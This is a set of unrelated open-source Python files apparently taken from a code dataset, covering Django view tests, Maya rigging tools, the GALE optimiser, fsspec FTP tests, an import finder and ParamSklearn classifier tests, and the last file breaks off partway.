freq_feature in ['COUNT', 'TFIDF']: # ntags = get_top_tags(segment_tags, 7) print(sample_size, text_features, freq_feature) ntags = ['ETA', 'EHDRH', 'AFR'] filtered_segtags = filter_segments(segment_tags, ntags) with open('Results/' + sample_size + '_' + text_features + '_' + freq_feature + '.txt', 'w') as f: for i in range(100): f.write(str(naive_bayes(filtered_segtags, normalize=(freq_feature is 'TFIDF'))) + '\n') # segment_tags = parsetags.parse_tags(sys.argv[1]) # big_segment_tags = increase_num_segments(segment_tags, 3000, length=1000) # ntags = get_top_tags(segment_tags, 7) # for # # ntags = ['NULL', 'ETA', 'EHDRH', 'AFR'] # common_words = get_common_words() # named_entities = get_named_entities() # filtered_segtags = filter_segments(segment_tags, ntags) # #entity_bow(filtered_segtags, named_entities, common_words) # naive_bayes(filtered_segtags, named_entities, common_words, features=entity_bow) # naive_bayes(filtered_segtags) # support_vector(filtered_segtags) # predicted_tags = [ntags[int(np.round(nb_predicted_tags[i]))] for i in range(len(svm_predicted_tags))] # count = 0 # print(ntags) # for i in range(len(predicted_tags)): # if predicted_tags[i] == 'NULL': # if all(tag not in segment_tags[shuffled_segments[i]] for tag in ntags): # count += 1 # else: # if predicted_tags[i] in segment_tags[shuffled_segments[i]]: # count += 1 # print(count/len(predicted_tags))
mit
4,742,825,620,163,231,000
33.544
104
0.683997
false
sburnett/seattle
seattlegeni/website/html/tests/ut_html_test_get_resources.py
1
5863
""" <Program> test_get_resources.py <Started> 8/30/2009 <Author> Jason Chen jchen@cs.washington.edu <Purpose> Tests that the get_resources view function handles normal operation and exceptions correctly. <Notes> See test_register.py for an explanation of our usage of the Django test client. """ #pragma out # We import the testlib FIRST, as the test db settings # need to be set before we import anything else. from seattlegeni.tests import testlib from seattlegeni.common.exceptions import * from seattlegeni.website.control import interface from seattlegeni.website.control import models from django.contrib.auth.models import User as DjangoUser # The django test client emulates a webclient, and returns what django # considers the final rendered result (in HTML). This allows to test purely the view # functions. from django.test.client import Client # Declare our mock functions def mock_get_logged_in_user(request): geniuser = models.GeniUser(username='tester', password='password', email='test@test.com', affiliation='test affil', user_pubkey='user_pubkey', user_privkey='user_privkey', donor_pubkey='donor_pubkey', usable_vessel_port='12345', free_vessel_credits=10) return geniuser def mock_acquire_vessels(geniuser, vesselcount, vesseltype): return ['test1', 'test2'] def mock_acquire_vessels_throws_UnableToAcquireResourcesError(geniuser, vesselcount, vesseltype): raise UnableToAcquireResourcesError def mock_acquire_vessels_throws_InsufficientUserResourcesError(geniuser, vesselcount, vesseltype): raise InsufficientUserResourcesError c = Client() good_data = {'num':5, 'env':'rand'} def main(): # Setup test environment testlib.setup_test_environment() testlib.setup_test_db() try: login_test_user() test_normal() test_interface_throws_UnableToAcquireResourcesError() test_interface_throws_InsufficientUserResourcesError() test_blank_POST_data() test_invalid_POST_data_invalid_num() test_invalid_POST_data_invalid_env() print "All tests passed." finally: testlib.teardown_test_db() testlib.teardown_test_environment() def test_normal(): """ <Purpose> Test normal behavior """ interface.acquire_vessels = mock_acquire_vessels response = c.post('/html/get_resources', good_data, follow=True) assert(response.status_code == 200) assert(response.template[0].name == 'control/myvessels.html') def test_interface_throws_UnableToAcquireResourcesError(): """ <Purpose> Test behavior if interface throws UnableToAcquireResourcesError. <Note> Checking only the existance of "action_summary" in the response is sufficient in seeing whether the view caught the error, since error messages are shown in that html element. (Of course, so are normal messages, but we are clearly having the interface throw an exception, so normal messages don't even exist in this context). """ interface.acquire_vessels = mock_acquire_vessels_throws_UnableToAcquireResourcesError response = c.post('/html/get_resources', good_data, follow=True) assert(response.status_code == 200) assert(response.template[0].name == 'control/myvessels.html') assert("Unable to acquire vessels at this time" in response.content) def test_interface_throws_InsufficientUserResourcesError(): """ <Purpose> Test behavior if interface throws InsufficientUserResourcesError. """ interface.acquire_vessels = mock_acquire_vessels_throws_InsufficientUserResourcesError response = c.post('/html/get_resources', good_data, follow=True) assert(response.status_code == 200) assert(response.template[0].name == 'control/myvessels.html') assert("Unable to acquire" in response.content) assert("vessel credit" in response.content) def test_blank_POST_data(): """ <Purpose> Test behavior if we submit blank POST data. """ interface.acquire_vessels = mock_acquire_vessels response = c.post('/html/get_resources', {}, follow=True) assert(response.status_code == 200) assert(response.template[0].name == 'control/myvessels.html') assert("This field is required" in response.content) def test_invalid_POST_data_invalid_num(): """ <Purpose> Test behavior if we submit POST data with an invalid 'num' field. """ interface.acquire_vessels = mock_acquire_vessels test_data = {'num':-5, 'env':'rand'} response = c.post('/html/get_resources', test_data, follow=True) assert(response.status_code == 200) assert(response.template[0].name == 'control/myvessels.html') assert("Select a valid choice" in response.content) def test_invalid_POST_data_invalid_env(): """ <Purpose> Test behavior if we submit POST data with an invalid 'env' field. """ interface.acquire_vessels = mock_acquire_vessels test_data = {'num':5, 'env':'notvalid'} response = c.post('/html/get_resources', test_data, follow=True) assert(response.status_code == 200) assert(response.template[0].name == 'control/myvessels.html') assert("Select a valid choice" in response.content) # Creates a test user in the test db, and uses the test client to 'login', # so all views that expect @login_required will now pass the login check. def login_test_user(): # uses the mock get_logged_in_user function that represents a logged in user interface.get_logged_in_user = mock_get_logged_in_user user = DjangoUser.objects.create_user('tester', 'test@test.com', 'testpassword') user.save() c.login(username='tester', password='testpassword') if __name__=="__main__": main()
mit
-4,059,790,173,869,409,300
29.196809
98
0.696572
false
daGrevis/squirrel
ware.py
1
2640
import inspect class MiddlewareDuplicationError(Exception): def __init__(self, middleware_name, middleware_names): message = ("Middleware `{}` was already found in `{}` middlewares!" .format(middleware_name, middleware_names)) super().__init__(message) class MiddlewareMissingError(Exception): def __init__(self, middleware_name, middleware_names): message = ("Middleware `{}` wasn't found between `{}` middlewares!" .format(middleware_name, middleware_names)) super().__init__(message) class MiddlewareOrderError(Exception): def __init__(self, middleware_name, names_for_before_middlewares, names_for_after_middlewares): message = ("Middleware `{}` can't be added before `{}` middlewares" " and after `{}` middlewares!" .format(middleware_name, names_for_before_middlewares, names_for_after_middlewares)) super().__init__(message) class MiddlewareArgumentsError(Exception): def __init__(self, middleware_name): message = ("Middleware `{}` has wrong count of arguments!" .format(middleware_name)) super().__init__(message) class Ware(object): def __init__(self, middlewares=[]): self.middlewares = [] def get_names_for_middlewares(self): return [name for name, _ in self.middlewares] def add(self, middleware_name, middleware_callable): if len((inspect.getfullargspec(middleware_callable)).args) != 1: raise MiddlewareArgumentsError(middleware_name) names_for_middlewares = self.get_names_for_middlewares() if middleware_name in names_for_middlewares: raise MiddlewareDuplicationError(middleware_name, names_for_middlewares) (self.middlewares).append((middleware_name, middleware_callable, )) def remove(self, middleware_name): names_for_middlewares = self.get_names_for_middlewares() if middleware_name not in names_for_middlewares: raise MiddlewareMissingError(middleware_name, names_for_middlewares) for i, (name, _) in enumerate(self.middlewares): if name == middleware_name: (self.middlewares).pop(i) break def run(self, initial_context={}): context = initial_context for _, middleware_callable in self.middlewares: context = middleware_callable(context) return context
mit
-4,876,543,742,609,040,000
33.285714
76
0.6
false
ejekt/rigging-system
Modules/System/groupSelected.py
1
9019
import maya.cmds as mc from functools import partial import os import System.utils as utils class GroupSelected: def __init__(self): self.objectsToGroup = [] def showUI(self): # build the grouping GUI self.findSelectionToGroup() if len(self.objectsToGroup) == 0: return self.dUiElements = {} if mc.window('groupSelected_UI_window', exists=True): mc.deleteUI('groupSelected_UI_window') windowWidth = 300 windowHeight = 150 self.dUiElements['window'] = mc.window('groupSelected_UI_window', w=windowWidth, h=windowHeight, t='Blueprint UI', sizeable=False,) self.dUiElements['topLevelColumn'] = mc.columnLayout(adj=True, columnAlign='center', rs=3) self.dUiElements['groupName_rowColumn'] = mc.rowColumnLayout(nc=2, columnAttach=[1,'right',0], columnWidth=[(1,80), (2,windowWidth-90)]) mc.text(label='Group Name :') self.dUiElements['groupName'] = mc.textField(text='group') mc.setParent(self.dUiElements['topLevelColumn']) self.dUiElements['createAt_rowColumn'] = mc.rowColumnLayout(nc=3, columnAttach=(1,'right',0), columnWidth=[(1,80),(2,windowWidth-170),(3,80)]) # row 1 mc.text(label='Position at :') mc.text(label='') mc.text(label='') # row 2 mc.text(label='') self.dUiElements['createAtBtn_lastSelected'] = mc.button(l='Last Selected', c=self.createAtLastSelected) mc.text(label='') # row 3 mc.text(label='') self.dUiElements['createAveragePosBtn_lastSelected'] = mc.button(l='Average Position', c=self.createAtAveragePosition) mc.text(label='') mc.setParent(self.dUiElements['topLevelColumn']) mc.separator() # final row of buttons columnWidth = (windowWidth/2) - 5 self.dUiElements['buttonRowLayout'] = mc.rowLayout(nc=2, columnAttach=[(1,'both',10),(2,'both',10)], columnWidth=[(1,columnWidth),(2,columnWidth)], columnAlign=[(1,'center'),(2,'center')]) self.dUiElements['acceptBtn'] = mc.button(l='Accept', c=self.acceptWindow) self.dUiElements['cancelBtn'] = mc.button(l='Cancel', c=self.cancelWindow) mc.showWindow(self.dUiElements['window']) self.createTempGroupRepresentation() self.createAtLastSelected() mc.select(self.tempGrpTransform, r=True) mc.setToolTo('moveSuperContext') def findSelectionToGroup(self): # filters selection to only contain module transform controls selectedObjects = mc.ls(sl=True, transforms=True) self.objectsToGroup = [] for obj in selectedObjects: valid = False if obj.find('module_transform') != -1: splitString = obj.rsplit('module_transform') if splitString[1] == '': valid = True if valid == False and obj.find('Group__') == 0: valid = True if valid == True: self.objectsToGroup.append(obj) def createTempGroupRepresentation(self): controlGrpFile = os.environ['RIGGING_TOOL_ROOT'] + '/ControlObjects/Blueprint/controlGroup_control.ma' mc.file(controlGrpFile, i=True) self.tempGrpTransform = mc.rename('controlGroup_control', 'Group__tempGroupTransform__') mc.connectAttr(self.tempGrpTransform+'.sy', self.tempGrpTransform+'.sx') mc.connectAttr(self.tempGrpTransform+'.sy', self.tempGrpTransform+'.sz') for attr in ['sx','sz','v']: mc.setAttr(self.tempGrpTransform+'.'+attr, l=True, k=False) mc.aliasAttr('globalScale', self.tempGrpTransform+'.sy') def createAtLastSelected(self, *args): controlPos = mc.xform(self.objectsToGroup[-1], q=True, ws=True, t=True) mc.xform(self.tempGrpTransform, ws=True, absolute=True, t=controlPos) def createAtAveragePosition(self, *args): controlPos = [0.0,0.0,0.0] for obj in self.objectsToGroup: objPos = mc.xform(obj, q=True, ws=True, absolute=True, t=True) controlPos[0] += objPos[0] controlPos[1] += objPos[1] controlPos[2] += objPos[2] numberOfObjects = len(self.objectsToGroup) controlPos[0] /= numberOfObjects controlPos[1] /= numberOfObjects controlPos[2] /= numberOfObjects mc.xform(self.tempGrpTransform, ws=True, absolute=True, t=controlPos) def cancelWindow(self, *args): mc.deleteUI(self.dUiElements['window']) mc.delete(self.tempGrpTransform) def acceptWindow(self, *args): groupName = mc.textField(self.dUiElements['groupName'], q=True, text=True) if self.createGroup(groupName) != None: mc.deleteUI(self.dUiElements['window']) def createGroup(self, sGroupName): # check that group of that name doesn't exist yet fullGroupName = 'Group__' + sGroupName if mc.objExists(fullGroupName): mc.confirmDialog(title='Name Conflict', m='Group \''+groupName+'\' already exists', button='Accept', db='Accept') return None # rename the tempGroup to the user specified name groupTransform = mc.rename(self.tempGrpTransform, fullGroupName) groupContainer = 'group_container' if not mc.objExists(groupContainer): mc.container(n=groupContainer) containers = [groupContainer] for obj in self.objectsToGroup: if obj.find('Group__') == 0: continue objNamespace = utils.stripLeadingNamespace(obj)[0] containers.append(objNamespace+':module_container') for c in containers: mc.lockNode(c, lock=False, lockUnpublished=False) if len(self.objectsToGroup) != 0: tempGroup = mc.group(self.objectsToGroup, absolute=True) groupParent = mc.listRelatives(tempGroup, parent=True) if groupParent: mc.parent(groupTransform, groupParent[0], absolute=True) mc.parent(self.objectsToGroup, groupTransform, absolute=True) mc.delete(tempGroup) self.addGroupToContainer(groupTransform) for c in containers: mc.lockNode(c, lock=True, lockUnpublished=True) mc.setToolTo('moveSuperContext') mc.select(groupTransform, r=True) return groupTransform def addGroupToContainer(self, sGroup): groupContainer = 'group_container' utils.addNodeToContainer(groupContainer, sGroup, includeShapes=True) groupName = sGroup.rpartition('Group__')[2] mc.container(groupContainer, e=True, publishAndBind=[sGroup+'.t', groupName+'_T']) mc.container(groupContainer, e=True, publishAndBind=[sGroup+'.r', groupName+'_R']) mc.container(groupContainer, e=True, publishAndBind=[sGroup+'.globalScale', groupName+'_globalScale']) def createGroupAtSpecified(self, sName, sTargetGroup, sParent): self.createTempGroupRepresentation() pCon = mc.parentConstraint(sTargetGroup, self.tempGrpTransform , mo=False)[0] mc.delete(pCon) scale = mc.getAttr(sTargetGroup+'.globalScale') mc.setAttr(self.tempGrpTransform +'.globalScale', scale) if sParent: mc.parent(self.tempGrpTransform , sParent, absolute=True) newGroup = self.createGroup(sName) return newGroup ###------------------------------------------------------------------------------------------- ### UNGROUPED SELECTED CLASS class UngroupSelected: def __init__(self): selectedObjects = mc.ls(sl=True, transforms=True) filteredGroups = [] for obj in selectedObjects: if obj.find('Group__') == 0: filteredGroups.append(obj) # no group selected just exit if len(filteredGroups) == 0: return groupContainer = 'group_container' # find any modules nested under the selected group modules = [] for group in filteredGroups: modules.extend(self.findChildModules(group)) # gather all module containers moduleContainers = [groupContainer] for module in modules: moduleContainer = module + ':module_container' moduleContainers.append(moduleContainer) # unlock each container for container in moduleContainers: mc.lockNode(container, l=False, lockUnpublished=False) # ungroup for group in filteredGroups: numChildren = len(mc.listRelatives(group, children=True)) if numChildren > 1: mc.ungroup(group, absolute=True) for attr in ['t','r','globalScale']: mc.container(groupContainer, e=True, unbindAndUnpublish=group+'.'+attr) parentGroup = mc.listRelatives(group, parent=True) mc.delete(group) # for the case that a group is left empty if parentGroup != None: parentGroup = parentGroup[0] children = mc.listRelatives(parentGroup, children=True) children = mc.ls(children, transforms=True) if len(children) == 0: mc.select(parentGroup, r=True) UngroupSelected() # lock the container for container in moduleContainers: if mc.objExists(container): mc.lockNode(container, l=True, lockUnpublished=True) def findChildModules(self, sGroup): modules = [] children = mc.listRelatives(sGroup, children = True) if children != None: for child in children: moduleNamespaceInfo = utils.stripLeadingNamespace(child) if moduleNamespaceInfo: modules.append(moduleNamespaceInfo[0]) elif child.find('Group__') != -1: modules.extend(self.findChildModules(child)) return modules
mit
-222,559,346,205,777,180
29.98227
144
0.684777
false
ai-se/parGALE
algorithms/serial/gale/gale.py
1
6295
from __future__ import print_function, division import sys, os sys.path.append(os.path.abspath(".")) from utils.lib import * from algorithms.serial.algorithm import Algorithm from where import Node, sqrt __author__ = 'panzer' def default_settings(): """ Default Settings for NSGA 3 :return: default settings """ return O( pop_size = 100, gens = 50, allowDomination = True, gamma = 0.15 ) class GALE(Algorithm): count = 0 unsatisfied = 0 """ .. [Krall2015] Krall, Menzies et.all, " GALE: Geometric Active Learning for Search-Based Software Engineering" Check References folder for the paper """ def __init__(self, problem, **settings): """ Initialize GALE algorithm :param problem: Instance of the problem :param gens: Max number of generations """ Algorithm.__init__(self, GALE.__name__, problem) self.select = self._select self.evolve = self._evolve self.recombine = self._recombine self.settings = default_settings().update(**settings) def run(self, init_pop=None): if init_pop is None: init_pop = self.problem.populate(self.settings.pop_size) population = Node.format(init_pop) best_solutions = [] gen = 0 while gen < self.settings.gens: say(".") total_evals = 0 # SELECTION selectees, evals = self.select(population) solutions, evals = self.get_best(selectees) best_solutions += solutions total_evals += evals # EVOLUTION selectees, evals = self.evolve(selectees) total_evals += evals population, evals = self.recombine(selectees, self.settings.pop_size) total_evals += evals gen += 1 print("") return best_solutions def get_best(self, non_dom_leaves): """ Return the best row from all the non dominated leaves :param non_dom_leaves: :return: """ bests = [] evals = 0 for leaf in non_dom_leaves: east = leaf._pop[0] west = leaf._pop[-1] if not east.evaluated: east.evaluate(self.problem) evals += 1 if not west.evaluated: west.evaluate(self.problem) evals += 1 weights = self.problem.directional_weights() weighted_west = [c*w for c,w in zip(west.objectives, weights)] weighted_east = [c*w for c,w in zip(east.objectives, weights)] objs = self.problem.objectives west_loss = Algorithm.dominates_continuous(weighted_west, weighted_east, mins=[o.low for o in objs], maxs=[o.high for o in objs]) east_loss = Algorithm.dominates_continuous(weighted_east, weighted_west, mins=[o.low for o in objs], maxs=[o.high for o in objs]) if east_loss < west_loss: bests.append(east) else: bests.append(west) return bests, evals def _select(self, pop): node = Node(self.problem, pop, self.settings.pop_size).divide(sqrt(pop)) non_dom_leafs = node.nonpruned_leaves() all_leafs = node.leaves() # Counting number of evals evals = 0 for leaf in all_leafs: for row in leaf._pop: if row.evaluated: evals+=1 return non_dom_leafs, evals def _evolve(self, selected): evals = 0 GAMMA = self.settings.gamma for leaf in selected: #Poles east = leaf._pop[0] west = leaf._pop[-1] # Evaluate poles if required if not east.evaluated: east.evaluate(self.problem) evals += 1 if not west.evaluated: west.evaluate(self.problem) evals += 1 weights = self.problem.directional_weights() weighted_west = [c*w for c,w in zip(west.objectives, weights)] weighted_east = [c*w for c,w in zip(east.objectives, weights)] objs = self.problem.objectives west_loss = Algorithm.dominates_continuous(weighted_west, weighted_east, mins=[o.low for o in objs], maxs=[o.high for o in objs]) east_loss = Algorithm.dominates_continuous(weighted_east, weighted_west, mins=[o.low for o in objs], maxs=[o.high for o in objs]) # Determine better Pole if east_loss < west_loss: south_pole,north_pole = east,west else: south_pole,north_pole = west,east # Magnitude of the mutations g = abs(south_pole.x - north_pole.x) for row in leaf._pop: clone = row.clone() clone_x = row.x for dec_index in range(len(self.problem.decisions)): # Few naming shorthands me = row.decisions[dec_index] good = south_pole.decisions[dec_index] bad = north_pole.decisions[dec_index] dec = self.problem.decisions[dec_index] if me > good: d = -1 elif me < good: d = +1 else : d = 0 # Mutating towards the better solution row.decisions[dec_index] = min(dec.high, max(dec.low, me + me * g * d)) # Project the mutant a = row.dist(self.problem, north_pole, is_obj=False) b = row.dist(self.problem, south_pole, is_obj=False) x = (a**2 + row.c**2 - b**2) / (2*row.c+0.00001) row.x = x GALE.count += 1 if abs(x - clone_x) > (g * GAMMA) or not self.problem.check_constraints(row.decisions): GALE.unsatisfied += 1 row.decisions = clone.decisions row.x = clone_x pop = [] for leaf in selected: for row in leaf._pop: if row.evaluated: row.evaluate(self.problem) # Re-evaluating pop.append(row) return pop, evals def _recombine(self, mutants, total_size): remaining = total_size - len(mutants) pop = [] for _ in range(remaining): pop.append(self.problem.generate()) return mutants + Node.format(pop), 0 def _test(): from problems.feature_models.webportal import WebPortal import time o = WebPortal() gale = GALE(o) start = time.time() gale.run() print(time.time() - start) print(GALE.count, GALE.unsatisfied) if __name__ == "__main__": _test()
unlicense
-9,061,544,763,114,333,000
28.980952
95
0.581732
false
intake/filesystem_spec
fsspec/implementations/tests/test_ftp.py
1
3434
import os import subprocess import sys import time import pytest import fsspec from fsspec import open_files from fsspec.implementations.ftp import FTPFileSystem here = os.path.dirname(os.path.abspath(__file__)) @pytest.fixture() def ftp(): pytest.importorskip("pyftpdlib") P = subprocess.Popen( [sys.executable, "-m", "pyftpdlib", "-d", here], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, ) try: time.sleep(1) yield "localhost", 2121 finally: P.terminate() P.wait() def test_basic(ftp): host, port = ftp fs = FTPFileSystem(host, port) assert fs.ls("/", detail=False) == sorted(os.listdir(here)) out = fs.cat("/" + os.path.basename(__file__)) assert out == open(__file__, "rb").read() def test_not_cached(ftp): host, port = ftp fs = FTPFileSystem(host, port) fs2 = FTPFileSystem(host, port) assert fs is not fs2 @pytest.mark.parametrize("cache_type", ["bytes", "mmap"]) def test_complex(ftp_writable, cache_type): from fsspec.core import BytesCache host, port, user, pw = ftp_writable files = open_files( "ftp:///ou*", host=host, port=port, username=user, password=pw, block_size=10000, cache_type=cache_type, ) assert len(files) == 1 with files[0] as fo: assert fo.read(10) == b"hellohello" if isinstance(fo.cache, BytesCache): assert len(fo.cache.cache) == 10010 assert fo.read(2) == b"he" assert fo.tell() == 12 def test_write_small(ftp_writable): host, port, user, pw = ftp_writable fs = FTPFileSystem(host, port, user, pw) with fs.open("/out2", "wb") as f: f.write(b"oi") assert fs.cat("/out2") == b"oi" def test_with_url(ftp_writable): host, port, user, pw = ftp_writable fo = fsspec.open("ftp://{}:{}@{}:{}/out".format(user, pw, host, port), "wb") with fo as f: f.write(b"hello") fo = fsspec.open("ftp://{}:{}@{}:{}/out".format(user, pw, host, port), "rb") with fo as f: assert f.read() == b"hello" @pytest.mark.parametrize("cache_type", ["bytes", "mmap"]) def test_write_big(ftp_writable, cache_type): host, port, user, pw = ftp_writable fs = FTPFileSystem(host, port, user, pw, block_size=1000, cache_type=cache_type) fn = "/bigger" with fs.open(fn, "wb") as f: f.write(b"o" * 500) assert not fs.exists(fn) f.write(b"o" * 1000) fs.invalidate_cache() assert fs.exists(fn) f.write(b"o" * 200) f.flush() assert fs.info(fn)["size"] == 1700 assert fs.cat(fn) == b"o" * 1700 def test_transaction(ftp_writable): host, port, user, pw = ftp_writable fs = FTPFileSystem(host, port, user, pw) fs.mkdir("/tmp") fn = "/tr" with fs.transaction: with fs.open(fn, "wb") as f: f.write(b"not") assert not fs.exists(fn) assert fs.exists(fn) assert fs.cat(fn) == b"not" fs.rm(fn) assert not fs.exists(fn) def test_transaction_with_cache(ftp_writable): host, port, user, pw = ftp_writable fs = FTPFileSystem(host, port, user, pw) fs.mkdir("/tmp") fs.mkdir("/tmp/dir") assert "dir" in fs.ls("/tmp", detail=False) with fs.transaction: fs.rmdir("/tmp/dir") assert "dir" not in fs.ls("/tmp", detail=False) assert not fs.exists("/tmp/dir")
bsd-3-clause
1,466,260,043,482,891,300
25.015152
84
0.586488
false
google/importlab
importlab/import_finder.py
1
5424
# NOTE: Do not add any dependencies to this file - it needs to be run in a # subprocess by a python version that might not have any installed packages, # including importlab itself. from __future__ import print_function import ast import json import os import sys # Pytype doesn't recognize the `major` attribute: # https://github.com/google/pytype/issues/127. if sys.version_info[0] >= 3: # Note that `import importlib` does not work: accessing `importlib.util` # will give an attribute error. This is hard to reproduce in a unit test but # can be seen by installing importlab in a Python 3 environment and running # `importlab --tree --trim` on a file that imports one of: # * jsonschema (`pip install jsonschema`) # * pytype (`pip install pytype`), # * dotenv (`pip install python-dotenv`) # * IPython (`pip install ipython`) # A correct output will look like: # Reading 1 files # Source tree: # + foo.py # :: jsonschema/__init__.py # An incorrect output will be missing the line with the import. import importlib.util else: import imp class ImportFinder(ast.NodeVisitor): """Walk an AST collecting import statements.""" def __init__(self): # tuples of (name, alias, is_from, is_star) self.imports = [] def visit_Import(self, node): for alias in node.names: self.imports.append((alias.name, alias.asname, False, False)) def visit_ImportFrom(self, node): module_name = '.'*node.level + (node.module or '') for alias in node.names: if alias.name == '*': self.imports.append((module_name, alias.asname, True, True)) else: if not module_name.endswith('.'): module_name = module_name + '.' name = module_name + alias.name asname = alias.asname or alias.name self.imports.append((name, asname, True, False)) def _find_package(parts): """Helper function for _resolve_import_versioned.""" for i in range(len(parts), 0, -1): prefix = '.'.join(parts[0:i]) if prefix in sys.modules: return i, sys.modules[prefix] return 0, None def is_builtin(name): return name in sys.builtin_module_names or name.startswith("__future__") # Pytype doesn't recognize the `major` attribute: # https://github.com/google/pytype/issues/127. if sys.version_info[0] < 3: def _resolve_import_versioned(name): """Python 2 helper function for resolve_import.""" parts = name.split('.') i, mod = _find_package(parts) if mod: if hasattr(mod, '__file__'): path = [os.path.dirname(mod.__file__)] elif hasattr(mod, '__path__'): path = mod.__path__ else: path = None else: path = None for part in parts[i:]: try: if path: spec = imp.find_module(part, [path]) else: spec = imp.find_module(part) except ImportError: return None path = spec[1] return path else: def _resolve_import_versioned(name): """Python 3 helper function for resolve_import.""" try: spec = importlib.util.find_spec(name) return spec and spec.origin except Exception: # find_spec may re-raise an arbitrary exception encountered while # inspecting a module. Since we aren't able to get the file path in # this case, we consider the import unresolved. return None def _resolve_import(name): """Helper function for resolve_import.""" if name in sys.modules: return getattr(sys.modules[name], '__file__', name + '.so') return _resolve_import_versioned(name) def resolve_import(name, is_from, is_star): """Use python to resolve an import. Args: name: The fully qualified module name. Returns: The path to the module source file or None. """ # Don't try to resolve relative imports or builtins here; they will be # handled by resolve.Resolver if name.startswith('.') or is_builtin(name): return None ret = _resolve_import(name) if ret is None and is_from and not is_star: package, _ = name.rsplit('.', 1) ret = _resolve_import(package) return ret def get_imports(filename): """Get all the imports in a file. Each import is a tuple of: (name, alias, is_from, is_star, source_file) """ with open(filename, "rb") as f: src = f.read() finder = ImportFinder() finder.visit(ast.parse(src, filename=filename)) imports = [] for i in finder.imports: name, _, is_from, is_star = i imports.append(i + (resolve_import(name, is_from, is_star),)) return imports def print_imports(filename): """Print imports in csv format to stdout.""" print(json.dumps(get_imports(filename))) def read_imports(imports_str): """Print imports in csv format to stdout.""" return json.loads(imports_str) if __name__ == "__main__": # This is used to parse a file with a different python version, launching a # subprocess and communicating with it via reading stdout. filename = sys.argv[1] print_imports(filename)
apache-2.0
7,626,106,175,522,213,000
31.285714
80
0.599742
false
automl/paramsklearn
tests/test_classification.py
1
31256
import os import resource import sys import traceback import unittest import mock import numpy as np import sklearn.datasets import sklearn.decomposition import sklearn.cross_validation import sklearn.ensemble import sklearn.svm from sklearn.utils.testing import assert_array_almost_equal from HPOlibConfigSpace.configuration_space import ConfigurationSpace, \ Configuration from HPOlibConfigSpace.hyperparameters import CategoricalHyperparameter from ParamSklearn.classification import ParamSklearnClassifier from ParamSklearn.components.base import ParamSklearnClassificationAlgorithm from ParamSklearn.components.base import ParamSklearnPreprocessingAlgorithm import ParamSklearn.components.classification as classification_components import ParamSklearn.components.feature_preprocessing as preprocessing_components from ParamSklearn.util import get_dataset from ParamSklearn.constants import * class TestParamSklearnClassifier(unittest.TestCase): def test_io_dict(self): classifiers = classification_components._classifiers for c in classifiers: if classifiers[c] == classification_components.ClassifierChoice: continue props = classifiers[c].get_properties() self.assertIn('input', props) self.assertIn('output', props) inp = props['input'] output = props['output'] self.assertIsInstance(inp, tuple) self.assertIsInstance(output, tuple) for i in inp: self.assertIn(i, (SPARSE, DENSE, SIGNED_DATA, UNSIGNED_DATA)) self.assertEqual(output, (PREDICTIONS,)) self.assertIn('handles_regression', props) self.assertFalse(props['handles_regression']) self.assertIn('handles_classification', props) self.assertIn('handles_multiclass', props) self.assertIn('handles_multilabel', props) def test_find_classifiers(self): classifiers = classification_components._classifiers self.assertGreaterEqual(len(classifiers), 2) for key in classifiers: if hasattr(classifiers[key], 'get_components'): continue self.assertIn(ParamSklearnClassificationAlgorithm, classifiers[key].__bases__) def test_find_preprocessors(self): preprocessors = preprocessing_components._preprocessors self.assertGreaterEqual(len(preprocessors), 1) for key in preprocessors: if hasattr(preprocessors[key], 'get_components'): continue self.assertIn(ParamSklearnPreprocessingAlgorithm, preprocessors[key].__bases__) def test_default_configuration(self): for i in range(2): cs = ParamSklearnClassifier.get_hyperparameter_search_space() default = cs.get_default_configuration() X_train, Y_train, X_test, Y_test = get_dataset(dataset='iris') auto = ParamSklearnClassifier(default) auto = auto.fit(X_train, Y_train) predictions = auto.predict(X_test) self.assertAlmostEqual(0.9599999999999995, sklearn.metrics.accuracy_score(predictions, Y_test)) scores = auto.predict_proba(X_test) def test_repr(self): cs = ParamSklearnClassifier.get_hyperparameter_search_space() default = cs.get_default_configuration() representation = repr(ParamSklearnClassifier(default)) cls = eval(representation) self.assertIsInstance(cls, ParamSklearnClassifier) def test_multilabel(self): # Use a limit of ~4GiB limit = 4000 * 1024 * 1024 resource.setrlimit(resource.RLIMIT_AS, (limit, limit)) dataset_properties = {'multilabel': True} cs = ParamSklearnClassifier.get_hyperparameter_search_space(dataset_properties=dataset_properties) print(cs) cs.seed(5) for i in range(50): X, Y = sklearn.datasets.\ make_multilabel_classification(n_samples=150, n_features=20, n_classes=5, n_labels=2, length=50, allow_unlabeled=True, sparse=False, return_indicator=True, return_distributions=False, random_state=1) X_train = X[:100, :] Y_train = Y[:100, :] X_test = X[101:, :] Y_test = Y[101:, ] config = cs.sample_configuration() config._populate_values() if 'classifier:passive_aggressive:n_iter' in config: config._values['classifier:passive_aggressive:n_iter'] = 5 if 'classifier:sgd:n_iter' in config: config._values['classifier:sgd:n_iter'] = 5 cls = ParamSklearnClassifier(config, random_state=1) print(config) try: cls.fit(X_train, Y_train) X_test_ = X_test.copy() predictions = cls.predict(X_test) self.assertIsInstance(predictions, np.ndarray) predicted_probabilities = cls.predict_proba(X_test_) [self.assertIsInstance(i, np.ndarray) for i in predicted_probabilities] except ValueError as e: if "Floating-point under-/overflow occurred at epoch" in \ e.args[0] or \ "removed all features" in e.args[0] or \ "all features are discarded" in e.args[0]: continue else: print(config) print(traceback.format_exc()) raise e except RuntimeWarning as e: if "invalid value encountered in sqrt" in e.args[0]: continue elif "divide by zero encountered in" in e.args[0]: continue elif "invalid value encountered in divide" in e.args[0]: continue elif "invalid value encountered in true_divide" in e.args[0]: continue else: print(config) print(traceback.format_exc()) raise e except UserWarning as e: if "FastICA did not converge" in e.args[0]: continue else: print(config) print(traceback.format_exc()) raise e except MemoryError as e: continue def test_configurations(self): # Use a limit of ~4GiB limit = 4000 * 1024 * 1024 resource.setrlimit(resource.RLIMIT_AS, (limit, limit)) cs = ParamSklearnClassifier.get_hyperparameter_search_space() print(cs) cs.seed(1) for i in range(10): config = cs.sample_configuration() config._populate_values() if config['classifier:passive_aggressive:n_iter'] is not None: config._values['classifier:passive_aggressive:n_iter'] = 5 if config['classifier:sgd:n_iter'] is not None: config._values['classifier:sgd:n_iter'] = 5 X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits') cls = ParamSklearnClassifier(config, random_state=1) print(config) try: cls.fit(X_train, Y_train) X_test_ = X_test.copy() predictions = cls.predict(X_test) self.assertIsInstance(predictions, np.ndarray) predicted_probabiliets = cls.predict_proba(X_test_) self.assertIsInstance(predicted_probabiliets, np.ndarray) except ValueError as e: if "Floating-point under-/overflow occurred at 